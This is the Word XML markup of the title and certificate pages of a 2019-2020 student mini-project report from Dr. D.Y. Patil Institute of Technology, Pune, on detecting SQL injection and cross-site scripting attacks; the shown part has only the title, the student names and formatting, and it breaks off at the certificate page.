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95" w:rsidRPr="00DB2C10" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dr.</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B000F9" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>D.</w:t>
      </w:r>
      <w:r w:rsidR="00B000F9" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Y.</w:t>
      </w:r>
      <w:r w:rsidR="00B000F9" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Patil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Institute of Technology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00DB2C10" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pimpri, Pune-411018</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00DB2C10" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A MINI-PROJECT REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00DB2C10"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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00DB2C10"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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00DB2C10"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8"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00044341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detection of</w:t>
      </w:r>
      <w:r w:rsidR="00FC2AFC" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="008F20BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>QL Injection attacks on L</w:t>
      </w:r>
      <w:r w:rsidR="00EF1C2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ibrary</w:t>
      </w:r>
      <w:r w:rsidR="00044341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
      <w:r w:rsidR="008F20BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Cross-s</w:t>
      </w:r>
      <w:r w:rsidR="00FC2AFC" w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ite Scripting attacks on</w:t>
      </w:r>
      <w:r w:rsidR="008F20BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> testphp.vulnweb.com</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965"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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965"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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965"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4"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">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F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Submitted by</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">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9F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">                   BCOA41</w:t>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t xml:space="preserve">Gauri </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gulwane</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">       BCOA43</w:t>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r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sampada</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Gaonkar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="008F20BF" w:rsidP="007C0695">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BCOA</w:t>
      </w:r>
      <w:r w:rsidR="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">46                                                              </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Devashish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A6244">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dhande</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C0695" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007C0695" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007C0695" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007C0695" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007C0695" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007C0695" w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E64456" w:rsidRPr="009F6965" w:rsidRDefault="00E64456">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00DB2C10" w:rsidRDefault="007C0695">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="00DB2C10" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Department of Computer Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2019-2020</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB2C10" w:rsidRDefault="00DB2C1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B2C10" w:rsidRPr="009F6965" w:rsidRDefault="00DB2C10" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007C0695" w:rsidRPr="009F6965" w:rsidRDefault="007C0695" w:rsidP="007C0695">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00DB2C10">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="00DB2C10" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dr.D.Y.Patil Institute of Technology</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PIMPRI, PUNE-411018</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:tabs>
          <w:tab w:val="center" w:pos="4453"/>
          <w:tab w:val="right" w:pos="8906"/>
        </w:tabs>
        <w:spacing w:before="20"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Department of Computer Engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6965">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009F6965" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="00DB2C10" w:rsidRDefault="00FC2AFC" w:rsidP="00FC2AFC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="148"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB2C10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Algerian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>CERTIFICATE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="00DB2C10" w:rsidRDefault="00FC2AFC" w:rsidP="00DB2C10">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="148"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC2AFC" w:rsidRPr="009A6244" w:rsidRDefault="00FC2AFC" w:rsidP="009A6244">
      <w:pPr>
